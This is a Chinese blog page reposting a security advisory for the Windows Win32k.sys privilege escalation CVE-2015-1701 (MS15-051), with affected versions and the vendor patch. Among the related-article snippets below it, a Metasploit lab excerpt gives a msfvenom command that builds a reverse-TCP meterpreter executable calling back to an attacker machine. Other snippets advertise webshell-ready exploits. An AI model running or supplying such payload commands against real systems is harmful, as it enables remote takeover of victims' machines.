linux 1701权限,Microsoft Windows 本地权限提升漏洞(CVE-2015-1701)(MS15-051)

最新推荐文章于 2023-10-27 09:50:43 发布
最新推荐文章于 2023-10-27 09:50:43 发布
阅读量146 收藏 1
点赞数
文章标签: linux 1701权限

Microsoft Windows 本地权限提升漏洞(CVE-2015-1701)(MS15-051)

发布日期:2015-05-12

更新日期:2015-05-14

受影响系统:

Microsoft Windows Vista

Microsoft Windows Server 2012 R2

Microsoft Windows Server 2012

Microsoft Windows Server 2008 R2

Microsoft Windows Server 2008

Microsoft Windows Server 2003

Microsoft Windows RT 8.1

Microsoft Windows RT

Microsoft Windows 8.1

Microsoft Windows 8

Microsoft Windows 7

描述:

BUGTRAQ  ID: 74245

CVE(CAN) ID: CVE-2015-1701

Windows是流行的计算机操作系统。

Win32k.sys内核模式驱动程序没有正确处理内存对象,在实现上存在权限提升漏洞,成功利用此漏洞可使攻击者在内核模式中运行任意代码。攻击者必须具有有效的登录凭证,并且可以本地登录以利用此漏洞。

链接:http://technet.microsoft.com/security/bulletin/MS15-051

*>

建议:

厂商补丁:

Microsoft

---------

Microsoft已经为此发布了一个安全公告(MS15-051)以及相应补丁:

MS15-051:Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191)

链接:http://technet.microsoft.com/security/bulletin/MS15-051

0b1331709591d260c1c78e86d0c51c18.png

唔叽哩
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[ 红队知识库 ] Windows & Linux 下常用的提权扫描辅助工具(含工具下载链接及使用介绍)
qq_51577576的博客
03-16 683
[ 红队知识库 ] Windows & Linux 下常用的提权扫描辅助工具(含工具下载链接及使用介绍)
渗透测试 ( 5 ) --- 扫描之王 nmap、渗透测试工具实战技巧合集
墨鱼菜鸡
07-11 5683
Nmap 官方文档 ( 中文文档是 Nmap 版本4.50,英文文档是最新的): 英文文档:https://nmap.org/book/man.html中文文档:https://nmap.org/man/zh/index.html#man-description官方 Nmap 项目指南:https://nmap.org/book/toc.html ...
CVE-2015-1701:APT攻击中使用的Win32k LPE漏洞
01-30
CVE-2015-1701:APT攻击中使用的Win32k LPE漏洞
Microsoft Windows权限提升漏洞(CVE-2015-1701)
weixin_34223655的博客
12-07 550
一个内核特权提升漏洞,如果***者在本地登录并可以在内核模式下运行任意代码,最严重的漏洞可能允许特权提升。***者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。 受影响的操作系统版本 Window受影响的操作系统版本Windows Server 2003Windows VistaWindows Server 2008...
MS15-051(CVE-2015-1701)漏洞复现
EC_Carrot的博客
03-30 1838
漏洞背景 Win32k.sys内核模式驱动程序没有正确处理内存对象,在实现上存在权限提升漏洞,成功利用此漏洞可使攻击者在内核模式中运行任意代码。攻击者必须具有有效的登录凭证,并且可以本地登录以利用此漏洞。远程或匿名用户无法利用此漏洞。 相应补丁号为:3045171 影响范围 Microsoft Windows Vista Microsoft Windows Server 2012 R2 Microsoft Windows Server 2012 Microsoft Windows Server 2008
MS15-051 修正版Exploit(Webshell可用)
weixin_30734435的博客
01-23 104
MS15-051简介:Windows 内核模式驱动程序中的漏洞可能允许特权提升 (3057191) , 如果攻击者在本地登录并可以在内核模式下运行任意代码,最严重的漏洞可能允许特权提升。 攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。 攻击者必须拥有有效的登录凭据并能本地登录才能利用此漏洞。 ...
红队专题-Perm权限提升与维持隐匿Privilege Escalation
最新发布
aming小老弟
10-27 653
权限不仅能对更多文件进行增删改查的操作,方便进一步收集主机系统中的敏感信息, system权限也可以提取内存中的密码Hash,为进一步的渗透提供更多信息。权限提升是从初始访问权限(通常是标准用户或应用程序帐户)一直提升到administrator, root甚至SYSTEM访问权限的艺术。常见技术或攻击手段来获得高权限帐户访问权限。用于检测和利用不同权限提升技术的手动方法,但会提到可以完成相同工作并节省您一些时间的自动化工具。 完美,它指向我们的有效负载。 使用net(也是默认安装的)启动此服务以获得
Web中间件常见安全漏洞
KHOST的博客
03-19 8211
第一章:IIS IIS 6 解析漏洞 IIS 7 解析漏洞 PUT任意文件写入 IIS短文件漏洞 HTTP.SYS远程代码执行 (MS15-034) RCE-CVE-2017-7269 第二章:Apache 未知扩展名解析漏洞 AddHandler导致的解析漏洞 ...
Http.sys远程代码执行漏洞复现
weixin_51387754的博客
04-23 782
Http.sys是Microsoft Windows处理HTTP请求的内核驱动程序。HTTP.sys会错误解析某些特殊构造的HTTP请求,导致远程代码执行漏洞。成功利用此漏洞后,攻击者可在System帐户上下文中执行任意代码。
MS15-051提权EXP
08-09
MS15-051提权EXP,
MS15-051 修正版Exploit(Webshell可用)-附件资源
03-02
MS15-051 修正版Exploit(Webshell可用)-附件资源
ms15-051利用工具
02-04
MS15-051攻击者在本地登录并可以在内核模式下运行任意代码,最严重的漏洞可能允许特权提升。受影响软件windows2003/windows2008/windows2012/windows7/windows8.1
ms15-051提权
A_dmin的博客
09-14 4136
ms15-051提权 实验概述   Metasploit是一款开源的渗透测试工具,可以帮助安全员发现漏洞问题,此工具带有的攻击模块可以帮助安全员简单的利用相关的漏洞,本实验通过Metasploit对内网机器进行渗透,并且使用ms15-051进行权限提升获取window server 2003的system权限,最后进行远程控制。 实验目的   1、熟练metasploit的使用方法   2、学会m...
Metasploit利用ms15-051漏洞进行权限提权
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
04-01 3667
Metasploit利用ms15-051漏洞进行权限提权 实验环境 虚拟机:kali-linux(攻击机) 192.168.18.142 window server 2003(靶机) 192.168.18.146 工具:Metasploit 步骤: 1、生成木马文件: msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.18.142 lport=4444 -f exe -o /root/shell.exe 2、服务器网站目录上创建个shell
MS15-051漏洞利用与修复
qq_45716477的博客
07-03 713
文章目录环境 环境 攻击机:Kali 2021.2 IP:192.168.45.135 靶机:Windows7 旗舰版 SP1 IP:192.168.45.134 使用工具: Metasploit | Xampp
权限提升windows平台-提权项目&MSF&CS&溢出漏洞
今天是几号的博客
02-04 2488
简介:WES-NG是一个基于Windows系统信息实用程序输出的工具,该实用程序提供了操作系统易受攻击的漏洞列表,包括对这些漏洞的任何利用。powershell运行(上传是为了收集系统打的补丁信息,作用等同于systeminfo,当无法上传文件时,可以用systeminfo中的信息覆盖KB.json文件)简介:这是一款基于主机的漏洞扫描工具,采用多线程确保可以快速的请求数据,采用线程锁可以在向sqlite数据库中写入数据避免。覆盖项目KB.json文件(一定格式的操作系统信息 补丁信息等)
443/1701
GOODBYE WORD
02-27 2333
说明: 1.tcp 443: 443 https 安全超文本传输协议(HTTP) 443端口即网页浏览端口,主要是用于HTTPS服务,是提供加密和通过安全端口传输的另一种HTTP。在一些对安全性要求较高的网站,比如银行、证券、购物等,都采用HTTPS服务,这样在这些网站上的交换信息,其他人抓包获取到的是加密数据,保证了交易的安全性...
Windows域环境漏洞CVE-2022-26923:权限提升与防范策略
本资源是一份关于Windows域环境漏洞分析的PPT,主要关注CVE-2022-26923漏洞的研究。Windows域环境是企业网络中的关键组成部分,其安全至关重要。这份报告详细探讨了Windows域的攻击链,包括可能的攻击步骤和目标,如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值